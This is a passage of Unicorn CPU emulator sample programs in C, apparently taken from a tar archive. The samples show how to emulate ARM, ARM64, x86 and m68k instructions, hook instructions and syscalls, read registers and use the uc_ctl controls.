uc_hook trace1, trace2; int pc; printf("Emulate THUMB MRS instruction\n"); // 0xf3ef8014 - mrs r0, control // Initialize emulator in ARM mode err = uc_open(UC_ARCH_ARM, UC_MODE_THUMB, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // Setup the cpu model. err = uc_ctl_set_cpu_model(uc, UC_CPU_ARM_CORTEX_M33); if (err) { printf("Failed on uc_ctl() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, "\xef\xf3\x14\x80", 4); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing one instruction at ADDRESS with customized callback uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, ADDRESS, ADDRESS); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. // Note we start at ADDRESS | 1 to indicate THUMB mode. err = uc_emu_start(uc, ADDRESS | 1, ADDRESS + 4, 0, 1); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_ARM_REG_PC, &pc); printf(">>> PC = 0x%x\n", pc); if (pc != ADDRESS + 4) { printf("Error, PC was 0x%x, expected was 0x%x.\n", pc, ADDRESS + 4); } uc_close(uc); } static void test_thumb_ite_internal(bool step, uint32_t *r2_out, uint32_t *r3_out) { uc_engine *uc; uc_err err; uint32_t sp = 0x1234; uint32_t r2 = 0, r3 = 1; err = uc_open(UC_ARCH_ARM, UC_MODE_THUMB, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); uc_mem_write(uc, ADDRESS, ARM_THUM_COND_CODE, sizeof(ARM_THUM_COND_CODE) - 1); uc_reg_write(uc, UC_ARM_REG_SP, &sp); uc_reg_write(uc, UC_ARM_REG_R2, &r2); uc_reg_write(uc, UC_ARM_REG_R3, &r3); if (!step) { err = uc_emu_start(uc, ADDRESS | 1, ADDRESS + sizeof(ARM_THUM_COND_CODE) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } } else { int i, addr = ADDRESS; for (i = 0; i < sizeof(ARM_THUM_COND_CODE) / 2; i++) { err = uc_emu_start(uc, addr | 1, ADDRESS + sizeof(ARM_THUM_COND_CODE) - 1, 0, 1); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } uc_reg_read(uc, UC_ARM_REG_PC, &addr); } } uc_reg_read(uc, UC_ARM_REG_R2, &r2); uc_reg_read(uc, UC_ARM_REG_R3, &r3); uc_close(uc); *r2_out = r2; *r3_out = r3; } static void test_thumb_ite(void) { uint32_t r2, r3; uint32_t step_r2, step_r3; printf("Emulate a THUMB ITE block as a whole or per instruction.\n"); // Run once. printf("Running the entire binary.\n"); test_thumb_ite_internal(false, &r2, &r3); printf(">>> R2: %d\n", r2); printf(">>> R3: %d\n\n", r3); // Step each instruction. printf("Running the binary one instruction at a time.\n"); test_thumb_ite_internal(true, &step_r2, &step_r3); printf(">>> R2: %d\n", step_r2); printf(">>> R3: %d\n\n", step_r3); if (step_r2 != r2 || step_r3 != r3) { printf("Failed with ARM ITE blocks stepping!\n"); } } static void test_read_sctlr(void) { uc_engine *uc; uc_err err; uc_arm_cp_reg reg; printf("Read the SCTLR register.\n"); err = uc_open(UC_ARCH_ARM, UC_MODE_ARM, &uc); if (err != UC_ERR_OK) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } // SCTLR. See arm reference. reg.cp = 15; reg.is64 = 0; reg.sec = 0; reg.crn = 1; reg.crm = 0; reg.opc1 = 0; reg.opc2 = 0; err = uc_reg_read(uc, UC_ARM_REG_CP_REG, ®); if (err != UC_ERR_OK) { printf("Failed on uc_reg_read() with error returned: %u\n", err); } printf(">>> SCTLR = 0x%" PRIx32 "\n", (uint32_t)reg.val); printf(">>> SCTLR.IE = %" PRId32 "\n", (uint32_t)((reg.val >> 31) & 1)); printf(">>> SCTLR.B = %" PRId32 "\n", (uint32_t)((reg.val >> 7) & 1)); uc_close(uc); } int main(int argc, char **argv, char **envp) { test_arm(); printf("==========================\n"); test_thumb(); printf("==========================\n"); test_armeb(); printf("==========================\n"); test_thumbeb(); printf("==========================\n"); test_thumb_mrs(); printf("==========================\n"); test_thumb_ite(); printf("==========================\n"); test_read_sctlr(); return 0; } �����������������������������������������������������unicorn-2.1.1/samples/sample_arm64.c����������������������������������������������������������������0000664�0000000�0000000�00000027045�14675241067�0017316�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh, 2015 */ /* Sample code to demonstrate how to emulate ARM64 code */ #include <unicorn/unicorn.h> #include <string.h> // code to be emulated #define ARM64_CODE \ "\xab\x05\x00\xb8\xaf\x05\x40\x38" // str w11, [x13], #0; ldrb w15, [x13], // #0 // #define ARM64_CODE_EB "\xb8\x00\x05\xab\x38\x40\x05\xaf" // str w11, [x13]; // ldrb w15, [x13] #define ARM64_CODE_EB ARM64_CODE // mrs x2, tpidrro_el0 #define ARM64_MRS_CODE "\x62\xd0\x3b\xd5" // memory address where emulation starts #define ADDRESS 0x10000 static void hook_block(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf(">>> Tracing basic block at 0x%" PRIx64 ", block size = 0x%x\n", address, size); } static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf(">>> Tracing instruction at 0x%" PRIx64 ", instruction size = 0x%x\n", address, size); } static void test_arm64_mem_fetch(void) { uc_engine *uc; uc_err err; uint64_t x1, sp, x0; // msr x0, CurrentEL unsigned char shellcode0[4] = {64, 66, 56, 213}; // .text:00000000004002C0 LDR X1, [SP,#arg_0] unsigned char shellcode[4] = {0xE1, 0x03, 0x40, 0xF9}; unsigned shellcode_address = 0x4002C0; uint64_t data_address = 0x10000000000000; printf(">>> Emulate ARM64 fetching stack data from high address %" PRIx64 "\n", data_address); // Initialize emulator in ARM mode err = uc_open(UC_ARCH_ARM64, UC_MODE_ARM, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } uc_mem_map(uc, data_address, 0x30000, UC_PROT_ALL); uc_mem_map(uc, 0x400000, 0x1000, UC_PROT_ALL); sp = data_address; uc_reg_write(uc, UC_ARM64_REG_SP, &sp); uc_mem_write(uc, data_address, "\xc8\xc8\xc8\xc8\xc8\xc8\xc8\xc8", 8); uc_mem_write(uc, shellcode_address, shellcode0, 4); uc_mem_write(uc, shellcode_address + 4, shellcode, 4); err = uc_emu_start(uc, shellcode_address, shellcode_address + 4, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } x0 = 0; uc_reg_read(uc, UC_ARM64_REG_X0, &x0); printf(">>> x0(Exception Level)=%" PRIx64 "\n", x0 >> 2); err = uc_emu_start(uc, shellcode_address + 4, shellcode_address + 8, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } uc_reg_read(uc, UC_ARM64_REG_X1, &x1); printf(">>> X1 = 0x%" PRIx64 "\n", x1); uc_close(uc); } static void test_arm64(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2; int64_t x11 = 0x12345678; // X11 register int64_t x13 = 0x10000 + 0x8; // X13 register int64_t x15 = 0x33; // X15 register printf("Emulate ARM64 code\n"); // Initialize emulator in ARM mode err = uc_open(UC_ARCH_ARM64, UC_MODE_ARM, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, ARM64_CODE, sizeof(ARM64_CODE) - 1); // initialize machine registers uc_reg_write(uc, UC_ARM64_REG_X11, &x11); uc_reg_write(uc, UC_ARM64_REG_X13, &x13); uc_reg_write(uc, UC_ARM64_REG_X15, &x15); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing one instruction at ADDRESS with customized callback uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, ADDRESS, ADDRESS); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(ARM64_CODE) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); printf(">>> As little endian, X15 should be 0x78:\n"); uc_reg_read(uc, UC_ARM64_REG_X15, &x15); printf(">>> X15 = 0x%" PRIx64 "\n", x15); uc_close(uc); } static void test_arm64eb(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2; int64_t x11 = 0x12345678; // X11 register int64_t x13 = 0x10000 + 0x8; // X13 register int64_t x15 = 0x33; // X15 register printf("Emulate ARM64 Big-Endian code\n"); // Initialize emulator in ARM mode err = uc_open(UC_ARCH_ARM64, UC_MODE_ARM + UC_MODE_BIG_ENDIAN, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, ARM64_CODE_EB, sizeof(ARM64_CODE_EB) - 1); // initialize machine registers uc_reg_write(uc, UC_ARM64_REG_X11, &x11); uc_reg_write(uc, UC_ARM64_REG_X13, &x13); uc_reg_write(uc, UC_ARM64_REG_X15, &x15); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing one instruction at ADDRESS with customized callback uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, ADDRESS, ADDRESS); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(ARM64_CODE_EB) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); printf(">>> As big endian, X15 should be 0x78:\n"); uc_reg_read(uc, UC_ARM64_REG_X15, &x15); printf(">>> X15 = 0x%" PRIx64 "\n", x15); uc_close(uc); } static void test_arm64_sctlr(void) { uc_engine *uc; uc_err err; uc_arm64_cp_reg reg; printf("Read the SCTLR register.\n"); err = uc_open(UC_ARCH_ARM64, UC_MODE_LITTLE_ENDIAN | UC_MODE_ARM, &uc); if (err != UC_ERR_OK) { printf("Failed on uc_open() with error returned: %u\n", err); } // SCTLR_EL1. See arm reference. reg.crn = 1; reg.crm = 0; reg.op0 = 0b11; reg.op1 = 0; reg.op2 = 0; err = uc_reg_read(uc, UC_ARM64_REG_CP_REG, ®); if (err != UC_ERR_OK) { printf("Failed on uc_reg_read() with error returned: %u\n", err); } printf(">>> SCTLR_EL1 = 0x%" PRIx64 "\n", reg.val); reg.op1 = 0b100; err = uc_reg_read(uc, UC_ARM64_REG_CP_REG, ®); if (err != UC_ERR_OK) { printf("Failed on uc_reg_read() with error returned: %u\n", err); } printf(">>> SCTLR_EL2 = 0x%" PRIx64 "\n", reg.val); uc_close(uc); } static uint32_t hook_mrs(uc_engine *uc, uc_arm64_reg reg, const uc_arm64_cp_reg *cp_reg, void *user_data) { uint64_t r_x2 = 0x114514; printf(">>> Hook MSR instruction. Write 0x114514 to X2.\n"); uc_reg_write(uc, reg, &r_x2); // Skip return 1; } static void test_arm64_hook_mrs(void) { uc_engine *uc; uc_err err; uint64_t r_x2; uc_hook hk; printf("Hook MRS instruction.\n"); err = uc_open(UC_ARCH_ARM64, UC_MODE_LITTLE_ENDIAN | UC_MODE_ARM, &uc); if (err != UC_ERR_OK) { printf("Failed on uc_open() with error returned: %u\n", err); } err = uc_mem_map(uc, 0x1000, 0x1000, UC_PROT_ALL); if (err != UC_ERR_OK) { printf("Failed on uc_mem_map() with error returned: %u\n", err); } err = uc_mem_write(uc, 0x1000, ARM64_MRS_CODE, sizeof(ARM64_MRS_CODE)); if (err != UC_ERR_OK) { printf("Failed on uc_mem_write() with error returned: %u\n", err); } err = uc_hook_add(uc, &hk, UC_HOOK_INSN, hook_mrs, NULL, 1, 0, UC_ARM64_INS_MRS); if (err != UC_ERR_OK) { printf("Failed on uc_hook_add() with error returned: %u\n", err); } err = uc_emu_start(uc, 0x1000, 0x1000 + sizeof(ARM64_MRS_CODE) - 1, 0, 0); if (err != UC_ERR_OK) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } err = uc_reg_read(uc, UC_ARM64_REG_X2, &r_x2); if (err != UC_ERR_OK) { printf("Failed on uc_reg_read() with error returned: %u\n", err); } printf(">>> X2 = 0x%" PRIx64 "\n", r_x2); uc_close(uc); } #define CHECK(x) \ do { \ if ((x) != UC_ERR_OK) { \ fprintf(stderr, "FAIL at %s:%d: %s\n", __FILE__, __LINE__, #x); \ exit(1); \ } \ } while (0) /* Test PAC support in the emulator. Code adapted from https://github.com/unicorn-engine/unicorn/issues/1789#issuecomment-1536320351 */ static void test_arm64_pac(void) { uc_engine *uc; uint64_t x1 = 0x0000aaaabbbbccccULL; // paciza x1 #define ARM64_PAC_CODE "\xe1\x23\xc1\xda" printf("Try ARM64 PAC\n"); // Initialize emulator in ARM mode CHECK(uc_open(UC_ARCH_ARM64, UC_MODE_ARM, &uc)); CHECK(uc_ctl_set_cpu_model(uc, UC_CPU_ARM64_MAX)); CHECK(uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL)); CHECK( uc_mem_write(uc, ADDRESS, ARM64_PAC_CODE, sizeof(ARM64_PAC_CODE) - 1)); CHECK(uc_reg_write(uc, UC_ARM64_REG_X1, &x1)); /** Initialize PAC support **/ uc_arm64_cp_reg reg; // SCR_EL3 reg.op0 = 0b11; reg.op1 = 0b110; reg.crn = 0b0001; reg.crm = 0b0001; reg.op2 = 0b000; CHECK(uc_reg_read(uc, UC_ARM64_REG_CP_REG, ®)); // NS && RW && API reg.val |= (1 | (1 << 10) | (1 << 17)); CHECK(uc_reg_write(uc, UC_ARM64_REG_CP_REG, ®)); // SCTLR_EL1 reg.op0 = 0b11; reg.op1 = 0b000; reg.crn = 0b0001; reg.crm = 0b0000; reg.op2 = 0b000; CHECK(uc_reg_read(uc, UC_ARM64_REG_CP_REG, ®)); // EnIA && EnIB reg.val |= (1 << 31) | (1 << 30); CHECK(uc_reg_write(uc, UC_ARM64_REG_CP_REG, ®)); // HCR_EL2 reg.op0 = 0b11; reg.op1 = 0b100; reg.crn = 0b0001; reg.crm = 0b0001; reg.op2 = 0b000; // HCR.API reg.val |= (1ULL << 41); CHECK(uc_reg_write(uc, UC_ARM64_REG_CP_REG, ®)); /** Check that PAC worked **/ CHECK( uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(ARM64_PAC_CODE) - 1, 0, 0)); CHECK(uc_reg_read(uc, UC_ARM64_REG_X1, &x1)); printf("X1 = 0x%" PRIx64 "\n", x1); if (x1 == 0x0000aaaabbbbccccULL) { printf("FAIL: No PAC tag added!\n"); } else { // Expect 0x1401aaaabbbbccccULL with the default key printf("SUCCESS: PAC tag found.\n"); } uc_close(uc); } int main(int argc, char **argv, char **envp) { test_arm64_mem_fetch(); printf("-------------------------\n"); test_arm64(); printf("-------------------------\n"); test_arm64eb(); printf("-------------------------\n"); test_arm64_sctlr(); printf("-------------------------\n"); test_arm64_hook_mrs(); printf("-------------------------\n"); test_arm64_pac(); return 0; } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/samples/sample_batch_reg.c������������������������������������������������������������0000664�0000000�0000000�00000006037�14675241067�0020301�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> #include <string.h> #include <stdio.h> int syscall_abi[] = {UC_X86_REG_RAX, UC_X86_REG_RDI, UC_X86_REG_RSI, UC_X86_REG_RDX, UC_X86_REG_R10, UC_X86_REG_R8, UC_X86_REG_R9}; uint64_t vals[7] = {200, 10, 11, 12, 13, 14, 15}; // This part of the API is less... clean... because Unicorn supports arbitrary // register types. So the least intrusive solution is passing individual // pointers. On the plus side, you only need to make this pointer array once. void *ptrs[7]; void uc_perror(const char *func, uc_err err) { fprintf(stderr, "Error in %s(): %s\n", func, uc_strerror(err)); } #define BASE 0x10000 // mov rax, 100; mov rdi, 1; mov rsi, 2; mov rdx, 3; mov r10, 4; mov r8, 5; mov // r9, 6; syscall #define CODE \ "\x48\xc7\xc0\x64\x00\x00\x00\x48\xc7\xc7\x01\x00\x00\x00\x48\xc7\xc6\x02" \ "\x00\x00\x00\x48\xc7\xc2\x03\x00\x00\x00\x49\xc7\xc2\x04\x00\x00\x00\x49" \ "\xc7\xc0\x05\x00\x00\x00\x49\xc7\xc1\x06\x00\x00\x00\x0f\x05" void hook_syscall(uc_engine *uc, void *user_data) { int i; uc_reg_read_batch(uc, syscall_abi, ptrs, 7); printf("syscall: {"); for (i = 0; i < 7; i++) { if (i != 0) printf(", "); printf("%" PRIu64, vals[i]); } printf("}\n"); } void hook_code(uc_engine *uc, uint64_t addr, uint32_t size, void *user_data) { printf("HOOK_CODE: 0x%" PRIx64 ", 0x%x\n", addr, size); } int main(void) { int i; uc_hook sys_hook; uc_err err; uc_engine *uc; // set up register pointers for (i = 0; i < 7; i++) { ptrs[i] = &vals[i]; } if ((err = uc_open(UC_ARCH_X86, UC_MODE_64, &uc))) { uc_perror("uc_open", err); return 1; } // reg_write_batch printf("reg_write_batch({200, 10, 11, 12, 13, 14, 15})\n"); if ((err = uc_reg_write_batch(uc, syscall_abi, ptrs, 7))) { uc_perror("uc_reg_write_batch", err); return 1; } // reg_read_batch memset(vals, 0, sizeof(vals)); if ((err = uc_reg_read_batch(uc, syscall_abi, ptrs, 7))) { uc_perror("uc_reg_read_batch", err); return 1; } printf("reg_read_batch = {"); for (i = 0; i < 7; i++) { if (i != 0) printf(", "); printf("%" PRIu64, vals[i]); } printf("}\n"); // syscall printf("\n"); printf("running syscall shellcode\n"); if ((err = uc_hook_add(uc, &sys_hook, UC_HOOK_INSN, hook_syscall, NULL, 1, 0, UC_X86_INS_SYSCALL))) { uc_perror("uc_hook_add", err); return 1; } if ((err = uc_mem_map(uc, BASE, 0x1000, UC_PROT_ALL))) { uc_perror("uc_mem_map", err); return 1; } if ((err = uc_mem_write(uc, BASE, CODE, sizeof(CODE) - 1))) { uc_perror("uc_mem_write", err); return 1; } if ((err = uc_emu_start(uc, BASE, BASE + sizeof(CODE) - 1, 0, 0))) { uc_perror("uc_emu_start", err); return 1; } uc_close(uc); return 0; } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/samples/sample_ctl.c������������������������������������������������������������������0000664�0000000�0000000�00000017515�14675241067�0017150�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Lazymio(@wtdcode), 2021 */ /* Sample code to demonstrate how to use uc_ctl */ #include <unicorn/unicorn.h> #include <string.h> #include <time.h> // code to be emulated // INC ecx; DEC edx; PXOR xmm0, xmm1 #define X86_CODE32 "\x41\x4a" // cmp eax, 0; // jg lb; // inc eax; // nop; // lb: // inc ebx; // nop; #define X86_JUMP_CODE "\x83\xf8\x00\x7f\x02\x40\x90\x43\x90" // memory address where emulation starts #define ADDRESS 0x10000 static void test_uc_ctl_read(void) { uc_engine *uc; uc_err err; int mode, arch; uint32_t pagesize; uint64_t timeout; printf("Reading some properties by uc_ctl.\n"); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } // Let's query some properties by uc_ctl. // Note uc_ctl_* is just tiny macro wrappers for uc_ctl(). err = uc_ctl_get_mode(uc, &mode); if (err) { printf("Failed on uc_ctl() with error returned: %u\n", err); return; } err = uc_ctl_get_arch(uc, &arch); if (err) { printf("Failed on uc_ctl() with error returned: %u\n", err); return; } err = uc_ctl_get_timeout(uc, &timeout); if (err) { printf("Failed on uc_ctl() with error returned: %u\n", err); return; } err = uc_ctl_get_page_size(uc, &pagesize); if (err) { printf("Failed on uc_ctl() with error returned: %u\n", err); return; } printf(">>> mode = %d, arch = %d, timeout=%" PRIu64 ", pagesize=%" PRIu32 "\n", mode, arch, timeout, pagesize); uc_close(uc); } static void trace_new_edge(uc_engine *uc, uc_tb *cur, uc_tb *prev, void *data) { printf(">>> Getting a new edge from 0x%" PRIx64 " to 0x%" PRIx64 ".\n", prev->pc + prev->size - 1, cur->pc); } void test_uc_ctl_exits(void) { uc_engine *uc; uc_err err; uc_hook h; int r_eax, r_ebx; uint64_t exits[] = {ADDRESS + 6, ADDRESS + 8}; printf("Using multiple exits by uc_ctl.\n"); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } err = uc_mem_map(uc, ADDRESS, 0x1000, UC_PROT_ALL); if (err) { printf("Failed on uc_mem_map() with error returned: %u\n", err); return; } // Write our code to the memory. err = uc_mem_write(uc, ADDRESS, X86_JUMP_CODE, sizeof(X86_JUMP_CODE) - 1); if (err) { printf("Failed on uc_mem_write() with error returned: %u\n", err); return; } // We trace if any new edge is generated. err = uc_hook_add(uc, &h, UC_HOOK_EDGE_GENERATED, trace_new_edge, NULL, 0, -1); if (err) { printf("Failed on uc_hook_add() with error returned: %u\n", err); return; } // Enable multiple exits. err = uc_ctl_exits_enable(uc); if (err) { printf("Failed on uc_ctl() with error returned: %u\n", err); return; } err = uc_ctl_set_exits(uc, exits, 2); if (err) { printf("Failed on uc_ctl() with error returned: %u\n", err); return; } // This should stop at ADDRESS + 6 and increase eax, even thouhg we don't // provide an exit. err = uc_emu_start(uc, ADDRESS, 0, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); return; } err = uc_reg_read(uc, UC_X86_REG_EAX, &r_eax); if (err) { printf("Failed on uc_reg_read() with error returned: %u\n", err); return; } err = uc_reg_read(uc, UC_X86_REG_EBX, &r_ebx); if (err) { printf("Failed on uc_reg_read() with error returned: %u\n", err); return; } printf(">>> eax = %" PRId32 " and ebx = %" PRId32 " after the first emulation\n", r_eax, r_ebx); // This should stop at ADDRESS + 8, even thouhg we don't provide an exit. err = uc_emu_start(uc, ADDRESS, 0, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); return; } err = uc_reg_read(uc, UC_X86_REG_EAX, &r_eax); if (err) { printf("Failed on uc_reg_read() with error returned: %u\n", err); return; } err = uc_reg_read(uc, UC_X86_REG_EBX, &r_ebx); if (err) { printf("Failed on uc_reg_read() with error returned: %u\n", err); return; } printf(">>> eax = %" PRId32 " and ebx = %" PRId32 " after the second emulation\n", r_eax, r_ebx); uc_close(uc); } #define TB_COUNT (8) #define TCG_MAX_INSNS (512) // from tcg.h #define CODE_LEN TB_COUNT *TCG_MAX_INSNS double time_emulation(uc_engine *uc, uint64_t start, uint64_t end) { time_t t1, t2; t1 = clock(); uc_emu_start(uc, start, end, 0, 0); t2 = clock(); return (t2 - t1) * 1000.0 / CLOCKS_PER_SEC; } static void test_uc_ctl_tb_cache(void) { uc_engine *uc; uc_err err; uc_tb tb; uc_hook h; char code[CODE_LEN]; double standard, cached, evicted; printf("Controling the TB cache in a finer granularity by uc_ctl.\n"); // Fill the code buffer with NOP. memset(code, 0x90, CODE_LEN); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } err = uc_mem_map(uc, ADDRESS, 0x10000, UC_PROT_ALL); if (err) { printf("Failed on uc_mem_map() with error returned: %u\n", err); return; } // Write our code to the memory. err = uc_mem_write(uc, ADDRESS, code, sizeof(code) - 1); if (err) { printf("Failed on uc_mem_write() with error returned: %u\n", err); return; } // We trace if any new edge is generated. // Note: In this sample, there is only **one** basic block while muliple // translation blocks is generated due to QEMU tcg buffer limit. In this // case, we don't consider it as a new edge. err = uc_hook_add(uc, &h, UC_HOOK_EDGE_GENERATED, trace_new_edge, NULL, 0, -1); if (err) { printf("Failed on uc_hook_add() with error returned: %u\n", err); return; } // Do emulation without any cache. standard = time_emulation(uc, ADDRESS, ADDRESS + sizeof(code) - 1); // Now we request cache for all TBs. for (int i = 0; i < TB_COUNT; i++) { err = uc_ctl_request_cache(uc, (uint64_t)(ADDRESS + i * TCG_MAX_INSNS), &tb); printf(">>> TB is cached at 0x%" PRIx64 " which has %" PRIu16 " instructions with %" PRIu16 " bytes.\n", tb.pc, tb.icount, tb.size); if (err) { printf("Failed on uc_ctl() with error returned: %u\n", err); return; } } // Do emulation with all TB cached. cached = time_emulation(uc, ADDRESS, ADDRESS + sizeof(code) - 1); // Now we clear cache for all TBs. for (int i = 0; i < TB_COUNT; i++) { err = uc_ctl_remove_cache(uc, (uint64_t)(ADDRESS + i * TCG_MAX_INSNS), (uint64_t)(ADDRESS + i * TCG_MAX_INSNS + 1)); if (err) { printf("Failed on uc_ctl() with error returned: %u\n", err); return; } } // Do emulation with all TB cache evicted. evicted = time_emulation(uc, ADDRESS, ADDRESS + sizeof(code) - 1); printf(">>> Run time: First time: %f, Cached: %f, Cache evicted: %f\n", standard, cached, evicted); uc_close(uc); } int main(int argc, char **argv, char **envp) { test_uc_ctl_read(); printf("====================\n"); test_uc_ctl_exits(); printf("====================\n"); test_uc_ctl_tb_cache(); return 0; } �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/samples/sample_m68k.c�����������������������������������������������������������������0000664�0000000�0000000�00000011452�14675241067�0017145�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Loi Anh Tuan, 2015 */ /* Sample code to demonstrate how to emulate m68k code */ #include <unicorn/unicorn.h> #include <string.h> // code to be emulated #define M68K_CODE "\x76\xed" // movq #-19, %d3 // memory address where emulation starts #define ADDRESS 0x10000 static void hook_block(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf(">>> Tracing basic block at 0x%" PRIx64 ", block size = 0x%x\n", address, size); } static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf(">>> Tracing instruction at 0x%" PRIx64 ", instruction size = 0x%x\n", address, size); } static void test_m68k(void) { uc_engine *uc; uc_hook trace1, trace2; uc_err err; int d0 = 0x0000; // d0 data register int d1 = 0x0000; // d1 data register int d2 = 0x0000; // d2 data register int d3 = 0x0000; // d3 data register int d4 = 0x0000; // d4 data register int d5 = 0x0000; // d5 data register int d6 = 0x0000; // d6 data register int d7 = 0x0000; // d7 data register int a0 = 0x0000; // a0 address register int a1 = 0x0000; // a1 address register int a2 = 0x0000; // a2 address register int a3 = 0x0000; // a3 address register int a4 = 0x0000; // a4 address register int a5 = 0x0000; // a5 address register int a6 = 0x0000; // a6 address register int a7 = 0x0000; // a6 address register int pc = 0x0000; // program counter int sr = 0x0000; // status register printf("Emulate M68K code\n"); // Initialize emulator in M68K mode err = uc_open(UC_ARCH_M68K, UC_MODE_BIG_ENDIAN, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, M68K_CODE, sizeof(M68K_CODE) - 1); // initialize machine registers uc_reg_write(uc, UC_M68K_REG_D0, &d0); uc_reg_write(uc, UC_M68K_REG_D1, &d1); uc_reg_write(uc, UC_M68K_REG_D2, &d2); uc_reg_write(uc, UC_M68K_REG_D3, &d3); uc_reg_write(uc, UC_M68K_REG_D4, &d4); uc_reg_write(uc, UC_M68K_REG_D5, &d5); uc_reg_write(uc, UC_M68K_REG_D6, &d6); uc_reg_write(uc, UC_M68K_REG_D7, &d7); uc_reg_write(uc, UC_M68K_REG_A0, &a0); uc_reg_write(uc, UC_M68K_REG_A1, &a1); uc_reg_write(uc, UC_M68K_REG_A2, &a2); uc_reg_write(uc, UC_M68K_REG_A3, &a3); uc_reg_write(uc, UC_M68K_REG_A4, &a4); uc_reg_write(uc, UC_M68K_REG_A5, &a5); uc_reg_write(uc, UC_M68K_REG_A6, &a6); uc_reg_write(uc, UC_M68K_REG_A7, &a7); uc_reg_write(uc, UC_M68K_REG_PC, &pc); uc_reg_write(uc, UC_M68K_REG_SR, &sr); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing all instruction uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(M68K_CODE) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } // now 